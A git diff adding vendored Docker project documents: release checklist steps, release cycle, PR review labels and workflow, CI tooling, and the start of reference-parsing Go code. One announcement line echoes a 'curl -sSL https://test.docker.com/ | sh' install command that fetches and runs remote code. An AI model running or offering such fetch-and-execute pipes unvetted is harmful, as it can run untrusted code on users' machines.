branch is going to be the base for the release. We need to push it to origin so we +can track the cherry-picked changes and the version bump: + +```bash +git push origin release/$BASE +``` + +When you have the major release branch in origin, we need to create the bump fork branch +that we'll push to our fork: + +```bash +git checkout -b bump_$VERSION +``` + +#### Patch releases + +If we have the release branch in origin, we can create the forked bump branch from it directly: + +```bash +export VERSION=vX.Y.Z +export PATCH=vX.Y.Z+1 +git fetch origin +git checkout --track origin/release/$BASE +git checkout -b bump_$PATCH +``` + +We cherry-pick only the commits we want into the bump branch: + +```bash +# get the commits ids we want to cherry-pick +git log +# cherry-pick the commits starting from the oldest one, without including merge commits +git cherry-pick -s -x +git cherry-pick -s -x +... +``` + +### 2. Update the VERSION files and API version on master + +We don't want to stop contributions to master just because we are releasing. +So, after the release branch is up, we bump the VERSION and API version to mark +the start of the "next" release. + +#### 2.1 Update the VERSION files + +Update the content of the `VERSION` file to be the next minor (incrementing Y) +and add the `-dev` suffix. For example, after the release branch for 1.5.0 is +created, the `VERSION` file gets updated to `1.6.0-dev` (as in "1.6.0 in the +making"). + +#### 2.2 Update API version on master + +We don't want API changes to go to the now frozen API version. Create a new +entry in `docs/reference/api/` by copying the latest and bumping the version +number (in both the file's name and content), and submit this in a PR against +master. + +### 3. Update CHANGELOG.md + +You can run this command for reference with git 2.0: + +```bash +git fetch --tags +LAST_VERSION=$(git tag -l --sort=-version:refname "v*" | grep -E 'v[0-9\.]+$' | head -1) +git log --stat $LAST_VERSION..bump_$VERSION +``` + +If you don't have git 2.0 but have a sort command that supports `-V`: +```bash +git fetch --tags +LAST_VERSION=$(git tag -l | grep -E 'v[0-9\.]+$' | sort -rV | head -1) +git log --stat $LAST_VERSION..bump_$VERSION +``` + +If releasing a major version (X or Y increased in vX.Y.Z), simply listing notable user-facing features is sufficient. +```markdown +#### Notable features since +* New docker command to do something useful +* Engine API change (deprecating old version) +* Performance improvements in some usecases +* ... +``` + +For minor releases (only Z increases in vX.Y.Z), provide a list of user-facing changes. +Each change should be listed under a category heading formatted as `#### CATEGORY`. + +`CATEGORY` should describe which part of the project is affected. + Valid categories are: + * Builder + * Documentation + * Hack + * Packaging + * Engine API + * Runtime + * Other (please use this category sparingly) + +Each change should be formatted as `BULLET DESCRIPTION`, given: + +* BULLET: either `-`, `+` or `*`, to indicate a bugfix, new feature or + upgrade, respectively. + +* DESCRIPTION: a concise description of the change that is relevant to the + end-user, using the present tense. Changes should be described in terms + of how they affect the user, for example "Add new feature X which allows Y", + "Fix bug which caused X", "Increase performance of Y". + +EXAMPLES: + +```markdown +## 0.3.6 (1995-12-25) + +#### Builder + ++ 'docker build -t FOO .' applies the tag FOO to the newly built image + +#### Engine API + +- Fix a bug in the optional unix socket transport + +#### Runtime + +* Improve detection of kernel version +``` + +If you need a list of contributors between the last major release and the +current bump branch, use something like: +```bash +git log --format='%aN <%aE>' v0.7.0...bump_v0.8.0 | sort -uf +``` +Obviously, you'll need to adjust version numbers as necessary. If you just need +a count, add a simple `| wc -l`. + +### 4. Change the contents of the VERSION file + +Before the big thing, you'll want to make successive release candidates and get +people to test. The release candidate number `N` should be part of the version: + +```bash +export RC_VERSION=${VERSION}-rcN +echo ${RC_VERSION#v} > VERSION +``` + +### 5. Test the docs + +Make sure that your tree includes documentation for any modified or +new features, syntax or semantic changes. + +To test locally: + +```bash +make docs +``` + +To make a shared test at https://beta-docs.docker.io: + +(You will need the `awsconfig` file added to the `docs/` dir) + +```bash +make AWS_S3_BUCKET=beta-docs.docker.io BUILD_ROOT=yes docs-release +``` + +### 6. Commit and create a pull request to the "release" branch + +```bash +git add VERSION CHANGELOG.md +git commit -m "Bump version to $VERSION" +git push $GITHUBUSER bump_$VERSION +echo "https://github.com/$GITHUBUSER/docker/compare/docker:release/$BASE...$GITHUBUSER:bump_$VERSION?expand=1" +``` + +That last command will give you the proper link to visit to ensure that you +open the PR against the "release" branch instead of accidentally against +"master" (like so many brave souls before you already have). + +### 7. Create a PR to update the AUTHORS file for the release + +Update the AUTHORS file, by running the `hack/generate-authors.sh` on the +release branch. To prevent duplicate entries, you may need to update the +`.mailmap` file accordingly. + +### 8. Build release candidate rpms and debs + +**NOTE**: It will be a lot faster if you pass a different graphdriver with +`DOCKER_GRAPHDRIVER` than `vfs`. + +```bash +docker build -t docker . +docker run \ + --rm -t --privileged \ + -e DOCKER_GRAPHDRIVER=aufs \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + docker \ + hack/make.sh binary build-deb build-rpm +``` + +### 9. Publish release candidate rpms and debs + +With the rpms and debs you built from the last step you can release them on the +same server, or ideally, move them to a dedicated release box via scp into +another docker/docker directory in bundles. This next step assumes you have +a checkout of the docker source code at the same commit you used to build, with +the artifacts from the last step in `bundles`. + +**NOTE:** If you put a space before the command your `.bash_history` will not +save it. (for the `GPG_PASSPHRASE`). + +```bash +docker build -t docker . +docker run --rm -it --privileged \ + -v /volumes/repos:/volumes/repos \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + -v $HOME/.gnupg:/root/.gnupg \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + -e GPG_PASSPHRASE \ + -e KEEPBUNDLE=1 \ + docker \ + hack/make.sh release-deb release-rpm sign-repos generate-index-listing +``` + +### 10. Upload the changed repos to wherever you host + +For example, above we bind mounted `/volumes/repos` as the storage for +`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with +a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with +a s3 bucket for the yum repo. + +### 11. Publish release candidate binaries + +To run this you will need access to the release credentials. Get them from the +Core maintainers. + +```bash +docker build -t docker . + +# static binaries are still pushed to s3 +docker run \ + -e AWS_S3_BUCKET=test.docker.com \ + -e AWS_ACCESS_KEY_ID \ + -e AWS_SECRET_ACCESS_KEY \ + -e AWS_DEFAULT_REGION \ + -i -t --privileged \ + docker \ + hack/release.sh +``` + +It will run the test suite, build the binaries and upload to the specified bucket, +so this is a good time to verify that you're running against **test**.docker.com. + +### 12. Purge the cache! + +After the binaries are uploaded to test.docker.com and the packages are on +apt.dockerproject.org and yum.dockerproject.org, make sure +they get tested in both Ubuntu and Debian for any obvious installation +issues or runtime issues. + +If everything looks good, it's time to create a git tag for this candidate: + +```bash +git tag -a $RC_VERSION -m $RC_VERSION bump_$VERSION +git push origin $RC_VERSION +``` + +Announcing on multiple medias is the best way to get some help testing! An easy +way to get some useful links for sharing: + +```bash +echo "Ubuntu/Debian: curl -sSL https://test.docker.com/ | sh" +echo "Linux 64bit binary: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}" +echo "Darwin/OSX 64bit client binary: https://test.docker.com/builds/Darwin/x86_64/docker-${VERSION#v}" +echo "Linux 64bit tgz: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}.tgz" +echo "Windows 64bit client binary: https://test.docker.com/builds/Windows/x86_64/docker-${VERSION#v}.exe" +echo "Windows 32bit client binary: https://test.docker.com/builds/Windows/i386/docker-${VERSION#v}.exe" +``` + +We recommend announcing the release candidate on: + +- IRC on #docker, #docker-dev, #docker-maintainers +- In a comment on the pull request to notify subscribed people on GitHub +- The [docker-dev](https://groups.google.com/forum/#!forum/docker-dev) group +- The [docker-maintainers](https://groups.google.com/a/dockerproject.org/forum/#!forum/maintainers) group +- Any social media that can bring some attention to the release candidate + +### 13. Iterate on successive release candidates + +Spend several days along with the community explicitly investing time and +resources to try and break Docker in every possible way, documenting any +findings pertinent to the release. This time should be spent testing and +finding ways in which the release might have caused various features or upgrade +environments to have issues, not coding. During this time, the release is in +code freeze, and any additional code changes will be pushed out to the next +release. + +It should include various levels of breaking Docker, beyond just using Docker +by the book. + +Any issues found may still remain issues for this release, but they should be +documented and give appropriate warnings. + +During this phase, the `bump_$VERSION` branch will keep evolving as you will +produce new release candidates. The frequency of new candidates is up to the +release manager: use your best judgement taking into account the severity of +reported issues, testers availability, and time to scheduled release date. + +Each time you'll want to produce a new release candidate, you will start by +adding commits to the branch, usually by cherry-picking from master: + +```bash +git cherry-pick -s -x -m0 +``` + +You want your "bump commit" (the one that updates the CHANGELOG and VERSION +files) to remain on top, so you'll have to `git rebase -i` to bring it back up. + +Now that your bump commit is back on top, you will need to update the CHANGELOG +file (if appropriate for this particular release candidate), and update the +VERSION file to increment the RC number: + +```bash +export RC_VERSION=$VERSION-rcN +echo $RC_VERSION > VERSION +``` + +You can now amend your last commit and update the bump branch: + +```bash +git commit --amend +git push -f $GITHUBUSER bump_$VERSION +``` + +Repeat step 6 to tag the code, publish new binaries, announce availability, and +get help testing. + +### 14. Finalize the bump branch + +When you're happy with the quality of a release candidate, you can move on and +create the real thing. + +You will first have to amend the "bump commit" to drop the release candidate +suffix in the VERSION file: + +```bash +echo $VERSION > VERSION +git add VERSION +git commit --amend +``` + +You will then repeat step 6 to publish the binaries to test + +### 15. Get 2 other maintainers to validate the pull request + +### 16. Build final rpms and debs + +```bash +docker build -t docker . +docker run \ + --rm -t --privileged \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + docker \ + hack/make.sh binary build-deb build-rpm +``` + +### 17. Publish final rpms and debs + +With the rpms and debs you built from the last step you can release them on the +same server, or ideally, move them to a dedicated release box via scp into +another docker/docker directory in bundles. This next step assumes you have +a checkout of the docker source code at the same commit you used to build, with +the artifacts from the last step in `bundles`. + +**NOTE:** If you put a space before the command your `.bash_history` will not +save it. (for the `GPG_PASSPHRASE`). + +```bash +docker build -t docker . +docker run --rm -it --privileged \ + -v /volumes/repos:/volumes/repos \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + -v $HOME/.gnupg:/root/.gnupg \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + -e GPG_PASSPHRASE \ + -e KEEPBUNDLE=1 \ + docker \ + hack/make.sh release-deb release-rpm sign-repos generate-index-listing +``` + +### 18. Upload the changed repos to wherever you host + +For example, above we bind mounted `/volumes/repos` as the storage for +`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with +a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with +a s3 bucket for the yum repo. + +### 19. Publish final binaries + +Once they're tested and reasonably believed to be working, run against +get.docker.com: + +```bash +docker build -t docker . +# static binaries are still pushed to s3 +docker run \ + -e AWS_S3_BUCKET=get.docker.com \ + -e AWS_ACCESS_KEY_ID \ + -e AWS_SECRET_ACCESS_KEY \ + -e AWS_DEFAULT_REGION \ + -i -t --privileged \ + docker \ + hack/release.sh +``` + +### 20. Purge the cache! + +### 21. Apply tag and create release + +It's very important that we don't make the tag until after the official +release is uploaded to get.docker.com! + +```bash +git tag -a $VERSION -m $VERSION bump_$VERSION +git push origin $VERSION +``` + +Once the tag is pushed, go to GitHub and create a [new release](https://github.com/docker/docker/releases/new). +If the tag is for an RC make sure you check `This is a pre-release` at the bottom of the form. + +Select the tag that you just pushed as the version and paste the changelog in the description of the release. +You can see examples in this two links: + +https://github.com/docker/docker/releases/tag/v1.8.0 +https://github.com/docker/docker/releases/tag/v1.8.0-rc3 + +### 22. Go to github to merge the `bump_$VERSION` branch into release + +Don't forget to push that pretty blue button to delete the leftover +branch afterwards! + +### 23. Update the docs branch + +You will need to point the docs branch to the newly created release tag: + +```bash +git checkout origin/docs +git reset --hard origin/$VERSION +git push -f origin docs +``` + +The docs will appear on https://docs.docker.com/ (though there may be cached +versions, so its worth checking http://docs.docker.com.s3-website-us-east-1.amazonaws.com/). +For more information about documentation releases, see `docs/README.md`. + +Note that the new docs will not appear live on the site until the cache (a complex, +distributed CDN system) is flushed. The `make docs-release` command will do this +_if_ the `DISTRIBUTION_ID` is set correctly - this will take at least 15 minutes to run +and you can check its progress with the CDN Cloudfront Chrome addon. + +### 24. Create a new pull request to merge your bump commit back into master + +```bash +git checkout master +git fetch +git reset --hard origin/master +git cherry-pick -s -x $VERSION +git push $GITHUBUSER merge_release_$VERSION +echo "https://github.com/$GITHUBUSER/docker/compare/docker:master...$GITHUBUSER:merge_release_$VERSION?expand=1" +``` + +Again, get two maintainers to validate, then merge, then push that pretty +blue button to delete your branch. + +### 25. Rejoice and Evangelize! + +Congratulations! You're done. + +Go forth and announce the glad tidings of the new release in `#docker`, +`#docker-dev`, on the [dev mailing list](https://groups.google.com/forum/#!forum/docker-dev), +the [announce mailing list](https://groups.google.com/forum/#!forum/docker-announce), +and on Twitter! diff --git a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md new file mode 100644 index 0000000000..d764e9d007 --- /dev/null +++ b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md @@ -0,0 +1,78 @@ +# Docker Release Process + +This document describes how the Docker project is released. The Docker project +release process targets the Engine, Compose, Kitematic, Machine, Swarm, +Distribution, Notary and their underlying dependencies (libnetwork, libkv, +etc...). + +Step-by-step technical details of the process are described in +[RELEASE-CHECKLIST.md](https://github.com/docker/docker/blob/master/project/RELEASE-CHECKLIST.md). + +## Release cycle + +The Docker project follows a **time-based release cycle** and ships every nine +weeks. A release cycle starts the same day the previous release cycle ends. + +The first six weeks of the cycle are dedicated to development and review. During +this phase, new features and bugfixes submitted to any of the projects are +**eligible** to be shipped as part of the next release. No changeset submitted +during this period is however guaranteed to be merged for the current release +cycle. + +## The freeze period + +Six weeks after the beginning of the cycle, the codebase is officially frozen +and the codebase reaches a state close to the final release. A Release Candidate +(RC) gets created at the same time. The freeze period is used to find bugs and +get feedback on the state of the RC before the release. + +During this freeze period, while the `master` branch will continue its normal +development cycle, no new features are accepted into the RC. As bugs are fixed +in `master` the release owner will selectively 'cherry-pick' critical ones to +be included into the RC. As the RC changes, new ones are made available for the +community to test and review. + +This period lasts for three weeks. + +## How to maximize chances of being merged before the freeze date? + +First of all, there is never a guarantee that a specific changeset is going to +be merged. However there are different actions to follow to maximize the chances +for a changeset to be merged: + +- The team gives priority to review the PRs aligned with the Roadmap (usually +defined by a ROADMAP.md file at the root of the repository). +- The earlier a PR is opened, the more time the maintainers have to review. For +example, if a PR is opened the day before the freeze date, it’s very unlikely +that it will be merged for the release. +- Constant communication with the maintainers (mailing-list, IRC, Github issues, +etc.) allows to get early feedback on the design before getting into the +implementation, which usually reduces the time needed to discuss a changeset. +- If the code is commented, fully tested and by extension follows every single +rules defined by the [CONTRIBUTING guide]( +https://github.com/docker/docker/blob/master/CONTRIBUTING.md), this will help +the maintainers by speeding up the review. + +## The release + +At the end of the freeze (nine weeks after the start of the cycle), all the +projects are released together. + +``` + Codebase Release +Start of is frozen (end of the +the Cycle (7th week) 9th week) ++---------------------------------------+---------------------+ +| | | +| Development phase | Freeze phase | +| | | ++---------------------------------------+---------------------+ + 6 weeks 3 weeks +<---------------------------------------><--------------------> +``` + +## Exceptions + +If a critical issue is found at the end of the freeze period and more time is +needed to address it, the release will be pushed back. When a release gets +pushed back, the next release cycle gets delayed as well. diff --git a/vendor/github.com/docker/docker/project/REVIEWING.md b/vendor/github.com/docker/docker/project/REVIEWING.md new file mode 100644 index 0000000000..51ef4c59de --- /dev/null +++ b/vendor/github.com/docker/docker/project/REVIEWING.md @@ -0,0 +1,246 @@ +# Pull request reviewing process + +## Labels + +Labels are carefully picked to optimize for: + + - Readability: maintainers must immediately know the state of a PR + - Filtering simplicity: different labels represent many different aspects of + the reviewing work, and can even be targeted at different maintainers groups. + +A pull request should only be attributed labels documented in this section: other labels that may +exist on the repository should apply to issues. + +### DCO labels + + * `dco/no`: automatically set by a bot when one of the commits lacks proper signature + +### Status labels + + * `status/0-triage` + * `status/1-design-review` + * `status/2-code-review` + * `status/3-docs-review` + * `status/4-ready-to-merge` + +Special status labels: + + * `status/failing-ci`: indicates that the PR in its current state fails the test suite + * `status/needs-attention`: calls for a collective discussion during a review session + +### Impact labels (apply to merged pull requests) + + * `impact/api` + * `impact/changelog` + * `impact/cli` + * `impact/deprecation` + * `impact/distribution` + * `impact/dockerfile` + +### Process labels (apply to merged pull requests) + +Process labels are to assist in preparing (patch) releases. These labels should only be used for pull requests. + +Label | Use for +------------------------------- | ------------------------------------------------------------------------- +`process/cherry-pick` | PRs that should be cherry-picked in the bump/release branch. These pull-requests must also be assigned to a milestone. +`process/cherry-picked` | PRs that have been cherry-picked. This label is helpful to find PR's that have been added to release-candidates, and to update the change log +`process/docs-cherry-pick` | PRs that should be cherry-picked in the docs branch. Only apply this label for changes that apply to the *current* release, and generic documentation fixes, such as Markdown and spelling fixes. +`process/docs-cherry-picked` | PRs that have been cherry-picked in the docs branch +`process/merge-to-master` | PRs that are opened directly on the bump/release branch, but also need to be merged back to "master" +`process/merged-to-master` | PRs that have been merged back to "master" + + +## Workflow + +An opened pull request can be in 1 of 5 distinct states, for each of which there is a corresponding +label that needs to be applied. + +### Triage - `status/0-triage` + +Maintainers are expected to triage new incoming pull requests by removing the `status/0-triage` +label and adding the correct labels (e.g. `status/1-design-review`) before any other interaction +with the PR. The starting label may potentially skip some steps depending on the kind of pull +request: use your best judgement. + +Maintainers should perform an initial, high-level, overview of the pull request before moving it to +the next appropriate stage: + + - Has DCO + - Contains sufficient justification (e.g., usecases) for the proposed change + - References the Github issue it fixes (if any) in the commit or the first Github comment + +Possible transitions from this state: + + * Close: e.g., unresponsive contributor without DCO + * `status/1-design-review`: general case + * `status/2-code-review`: e.g. trivial bugfix + * `status/3-docs-review`: non-proposal documentation-only change + +### Design review - `status/1-design-review` + +Maintainers are expected to comment on the design of the pull request. Review of documentation is +expected only in the context of design validation, not for stylistic changes. + +Ideally, documentation should reflect the expected behavior of the code. No code review should +take place in this step. + +There are no strict rules on the way a design is validated: we usually aim for a consensus, +although a single maintainer approval is often sufficient for obviously reasonable changes. In +general, strong disagreement expressed by any of the maintainers should not be taken lightly. + +Once design is approved, a maintainer should make sure to remove this label and add the next one. + +Possible transitions from this state: + + * Close: design rejected + * `status/2-code-review`: general case + * `status/3-docs-review`: proposals with only documentation changes + +### Code review - `status/2-code-review` + +Maintainers are expected to review the code and ensure that it is good quality and in accordance +with the documentation in the PR. + +New testcases are expected to be added. Ideally, those testcases should fail when the new code is +absent, and pass when present. The testcases should strive to test as many variants, code paths, as +possible to ensure maximum coverage. + +Changes to code must be reviewed and approved (LGTM'd) by a minimum of two code maintainers. When +the author of a PR is a maintainer, he still needs the approval of two other maintainers. + +Once code is approved according to the rules of the subsystem, a maintainer should make sure to +remove this label and add the next one. If documentation is absent but expected, maintainers should +ask for documentation and move to status `status/3-docs-review` for docs maintainer to follow. + +Possible transitions from this state: + + * Close + * `status/1-design-review`: new design concerns are raised + * `status/3-docs-review`: general case + * `status/4-ready-to-merge`: change not impacting documentation + +### Docs review - `status/3-docs-review` + +Maintainers are expected to review the documentation in its bigger context, ensuring consistency, +completeness, validity, and breadth of coverage across all existing and new documentation. + +They should ask for any editorial change that makes the documentation more consistent and easier to +understand. + +The docker/docker repository only contains _reference documentation_, all +"narrative" documentation is kept in a [unified documentation +repository](https://github.com/docker/docker.github.io). Reviewers must +therefore verify which parts of the documentation need to be updated. Any +contribution that may require changing the narrative should get the +`impact/documentation` label: this is the signal for documentation maintainers +that a change will likely need to happen on the unified documentation +repository. When in doubt, it’s better to add the label and leave it to +documentation maintainers to decide whether it’s ok to skip. In all cases, +leave a comment to explain what documentation changes you think might be needed. + +- If the pull request does not impact the documentation at all, the docs review + step is skipped, and the pull request is ready to merge. +- If the changes in + the pull request require changes to the reference documentation (either + command-line reference, or API reference), those changes must be included as + part of the pull request and will be reviewed now. Keep in mind that the + narrative documentation may contain output examples of commands, so may need + to be updated as well, in which case the `impact/documentation` label must + be applied. +- If the PR has the `impact/documentation` label, merging is delayed until a + documentation maintainer acknowledges that a corresponding documentation PR + (or issue) is opened on the documentation repository. Once a documentation + maintainer acknowledges the change, she/he will move the PR to `status/4-merge` + for a code maintainer to push the green button. + +Changes and additions to docs must be reviewed and approved (LGTM'd) by a minimum of two docs +sub-project maintainers. If the docs change originates with a docs maintainer, only one additional +LGTM is required (since we assume a docs maintainer approves of their own PR). + +Once documentation is approved, a maintainer should make sure to remove this label and +add the next one. + +Possible transitions from this state: + + * Close + * `status/1-design-review`: new design concerns are raised + * `status/2-code-review`: requires more code changes + * `status/4-ready-to-merge`: general case + +### Merge - `status/4-ready-to-merge` + +Maintainers are expected to merge this pull request as soon as possible. They can ask for a rebase +or carry the pull request themselves. + +Possible transitions from this state: + + * Merge: general case + * Close: carry PR + +After merging a pull request, the maintainer should consider applying one or multiple impact labels +to ease future classification: + + * `impact/api` signifies the patch impacted the Engine API + * `impact/changelog` signifies the change is significant enough to make it in the changelog + * `impact/cli` signifies the patch impacted a CLI command + * `impact/dockerfile` signifies the patch impacted the Dockerfile syntax + * `impact/deprecation` signifies the patch participates in deprecating an existing feature + +### Close + +If a pull request is closed it is expected that sufficient justification will be provided. In +particular, if there are alternative ways of achieving the same net result then those needs to be +spelled out. If the pull request is trying to solve a use case that is not one that we (as a +community) want to support then a justification for why should be provided. + +The number of maintainers it takes to decide and close a PR is deliberately left unspecified. We +assume that the group of maintainers is bound by mutual trust and respect, and that opposition from +any single maintainer should be taken into consideration. Similarly, we expect maintainers to +justify their reasoning and to accept debating. + +## Escalation process + +Despite the previously described reviewing process, some PR might not show any progress for various +reasons: + + - No strong opinion for or against the proposed patch + - Debates about the proper way to solve the problem at hand + - Lack of consensus + - ... + +All these will eventually lead to stalled PR, where no apparent progress is made across several +weeks, or even months. + +Maintainers should use their best judgement and apply the `status/needs-attention` label. It must +be used sparingly, as each PR with such label will be discussed by a group of maintainers during a +review session. The goal of that session is to agree on one of the following outcomes for the PR: + + * Close, explaining the rationale for not pursuing further + * Continue, either by pushing the PR further in the workflow, or by deciding to carry the patch + (ideally, a maintainer should be immediately assigned to make sure that the PR keeps continued + attention) + * Escalate to Solomon by formulating a few specific questions on which his answers will allow + maintainers to decide. + +## Milestones + +Typically, every merged pull request get shipped naturally with the next release cut from the +`master` branch (either the next minor or major version, as indicated by the +[`VERSION`](https://github.com/docker/docker/blob/master/VERSION) file at the root of the +repository). However, the time-based nature of the release process provides no guarantee that a +given pull request will get merged in time. In other words, all open pull requests are implicitly +considered part of the next minor or major release milestone, and this won't be materialized on +GitHub. + +A merged pull request must be attached to the milestone corresponding to the release in which it +will be shipped: this is both useful for tracking, and to help the release manager with the +changelog generation. + +An open pull request may exceptionally get attached to a milestone to express a particular intent to +get it merged in time for that release. This may for example be the case for an important feature to +be included in a minor release, or a critical bugfix to be included in a patch release. + +Finally, and as documented by the [`PATCH-RELEASES.md`](PATCH-RELEASES.md) process, the existence of +a milestone is not a guarantee that a release will happen, as some milestones will be created purely +for the purpose of bookkeeping diff --git a/vendor/github.com/docker/docker/project/TOOLS.md b/vendor/github.com/docker/docker/project/TOOLS.md new file mode 100644 index 0000000000..26303c3021 --- /dev/null +++ b/vendor/github.com/docker/docker/project/TOOLS.md @@ -0,0 +1,63 @@ +# Tools + +This page describes the tools we use and infrastructure that is in place for +the Docker project. + +### CI + +The Docker project uses [Jenkins](https://jenkins.dockerproject.org/) as our +continuous integration server. Each Pull Request to Docker is tested by running the +equivalent of `make all`. We chose Jenkins because we can host it ourselves and +we run Docker in Docker to test. + +#### Leeroy + +Leeroy is a Go application which integrates Jenkins with +GitHub pull requests. Leeroy uses +[GitHub hooks](https://developer.github.com/v3/repos/hooks/) +to listen for pull request notifications and starts jobs on your Jenkins +server. Using the Jenkins +[notification plugin][https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin], +Leeroy updates the pull request using GitHub's +[status API](https://developer.github.com/v3/repos/statuses/) +with pending, success, failure, or error statuses. + +The leeroy repository is maintained at +[github.com/docker/leeroy](https://github.com/docker/leeroy). + +#### GordonTheTurtle IRC Bot + +The GordonTheTurtle IRC Bot lives in the +[#docker-maintainers](https://botbot.me/freenode/docker-maintainers/) channel +on Freenode. He is built in Go and is based off the project at +[github.com/fabioxgn/go-bot](https://github.com/fabioxgn/go-bot). + +His main command is `!rebuild`, which rebuilds a given Pull Request for a repository. +This command works by integrating with Leroy. He has a few other commands too, such +as `!gif` or `!godoc`, but we are always looking for more fun commands to add. + +The gordon-bot repository is maintained at +[github.com/docker/gordon-bot](https://github.com/docker/gordon-bot) + +### NSQ + +We use [NSQ](https://github.com/bitly/nsq) for various aspects of the project +infrastructure. + +#### Hooks + +The hooks project, +[github.com/crosbymichael/hooks](https://github.com/crosbymichael/hooks), +is a small Go application that manages web hooks from github, hub.docker.com, or +other third party services. + +It can be used for listening to github webhooks & pushing them to a queue, +archiving hooks to rethinkdb for processing, and broadcasting hooks to various +jobs. + +#### Docker Master Binaries + +One of the things queued from the Hooks are the building of the Master +Binaries. This happens on every push to the master branch of Docker. The +repository for this is maintained at +[github.com/docker/docker-bb](https://github.com/docker/docker-bb). diff --git a/vendor/github.com/docker/docker/reference/reference.go b/vendor/github.com/docker/docker/reference/reference.go new file mode 100644 index 0000000000..996fc50704 --- /dev/null +++ b/vendor/github.com/docker/docker/reference/reference.go @@ -0,0 +1,216 @@ +package reference + +import ( + "errors" + "fmt" + "strings" + + "github.com/docker/distribution/digest" + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/image/v1" +) + +const ( + // DefaultTag defines the default tag used when performing images related actions and no tag or digest is specified + DefaultTag = "latest" + // DefaultHostname is the default built-in hostname + DefaultHostname = "docker.io" + // LegacyDefaultHostname is automatically converted to DefaultHostname + LegacyDefaultHostname = "index.docker.io" + // DefaultRepoPrefix is the prefix used for default repositories in default host + DefaultRepoPrefix = "library/" +) + +// Named is an object with a full name +type Named interface { + // Name returns normalized repository name, like "ubuntu". + Name() string + // String returns full reference, like "ubuntu@sha256:abcdef..." + String() string + // FullName returns full repository name with hostname, like "docker.io/library/ubuntu" + FullName() string + // Hostname returns hostname for the reference, like "docker.io" + Hostname() string + // RemoteName returns the repository component of the full name, like "library/ubuntu" + RemoteName() string +} + +// NamedTagged is an object including a name and tag. +type NamedTagged interface { + Named + Tag() string +} + +// Canonical reference is an object with a fully unique +// name including a name with hostname and digest +type Canonical interface { + Named + Digest() digest.Digest +} + +// ParseNamed parses s and returns a syntactically valid reference implementing +// the Named interface. The reference must have a name, otherwise an error is +// returned. +// If an error was encountered it is returned, along with a nil Reference. +func ParseNamed(s string) (Named, error) { + named, err := distreference.ParseNamed(s) + if err != nil { + return nil, fmt.Errorf("Error parsing reference: %q is not a valid repository/tag: %s", s, err) + } + r, err := WithName(named.Name()) + if err != nil { + return nil, err + } + if canonical, isCanonical := named.(distreference.Canonical); isCanonical { + return WithDigest(r, canonical.Digest()) + } + if tagged, isTagged := named.(distreference.NamedTagged); isTagged { + return WithTag(r, tagged.Tag()) + } + return r, nil +} + +// TrimNamed removes any tag or digest from the named reference +func TrimNamed(ref Named) Named { + return &namedRef{distreference.TrimNamed(ref)} +} + +// WithName returns a named object representing the given string. If the input +// is invalid ErrReferenceInvalidFormat will be returned. +func WithName(name string) (Named, error) { + name, err := normalize(name) + if err != nil { + return nil, err + } + if err := validateName(name); err != nil { + return nil, err + } + r, err := distreference.WithName(name) + if err != nil { + return nil, err + } + return &namedRef{r}, nil +} + +// WithTag combines the name from "name" and the tag from "tag" to form a +// reference incorporating both the name and the tag. +func WithTag(name Named, tag string) (NamedTagged, error) { + r, err := distreference.WithTag(name, tag) + if err != nil { + return nil, err + } + return &taggedRef{namedRef{r}}, nil +} + +// WithDigest combines the name from "name" and the digest from "digest" to form +// a reference incorporating both the name and the digest. +func WithDigest(name Named, digest digest.Digest) (Canonical, error) { + r, err := distreference.WithDigest(name, digest) + if err != nil { + return nil, err + } + return &canonicalRef{namedRef{r}}, nil +} + +type namedRef struct { + distreference.Named +} +type taggedRef struct { + namedRef +} +type canonicalRef struct { + namedRef +} + +func (r *namedRef) FullName() string { + hostname, remoteName := splitHostname(r.Name()) + return hostname + "/" + remoteName +} +func (r *namedRef) Hostname() string { + hostname, _ := splitHostname(r.Name()) + return hostname +} +func (r *namedRef) RemoteName() string { + _, remoteName := splitHostname(r.Name()) + return remoteName +} +func (r *taggedRef) Tag() string { + return r.namedRef.Named.(distreference.NamedTagged).Tag() +} +func (r *canonicalRef) Digest() digest.Digest { + return r.namedRef.Named.(distreference.Canonical).Digest() +} + +// WithDefaultTag adds a default tag to a reference if it only has a repo name. +func WithDefaultTag(ref Named) Named { + if IsNameOnly(ref) { + ref, _ = WithTag(ref, DefaultTag) + } + return ref +} + +// IsNameOnly returns true if reference only contains a repo name. +func IsNameOnly(ref Named) bool { + if _, ok := ref.(NamedTagged); ok { + return false + } + if _, ok := ref.(Canonical); ok { + return false + } + return true +} + +// ParseIDOrReference parses string for an image ID or a reference. ID can be +// without a default prefix. +func ParseIDOrReference(idOrRef string) (digest.Digest, Named, error) { + if err := v1.ValidateID(idOrRef); err == nil { + idOrRef = "sha256:" + idOrRef + } + if dgst, err := digest.ParseDigest(idOrRef); err == nil { + return dgst, nil, nil + } + ref, err := ParseNamed(idOrRef) + return "", ref, err +} + +// splitHostname splits a repository name to hostname and remotename string. +// If no valid hostname is found, the default hostname is used. Repository name +// needs to be already validated before. +func splitHostname(name string) (hostname, remoteName string) { + i := strings.IndexRune(name, '/') + if i == -1 || (!strings.ContainsAny(name[:i], ".:") && name[:i] != "localhost") { + hostname, remoteName = DefaultHostname, name + } else { + hostname, remoteName = name[:i], name[i+1:] + } + if hostname == LegacyDefaultHostname { + hostname = DefaultHostname + } + if hostname == DefaultHostname && !strings.ContainsRune(remoteName, '/') { + remoteName = DefaultRepoPrefix + remoteName + } + return +} + +// normalize returns a repository name in its normalized form, meaning it +// will not contain default hostname nor library/ prefix for official images. +func normalize(name string) (string, error) { + host, remoteName := splitHostname(name) + if strings.ToLower(remoteName) != remoteName { + return "", errors.New("invalid reference format: repository name must be lowercase") + } + if host == DefaultHostname { + 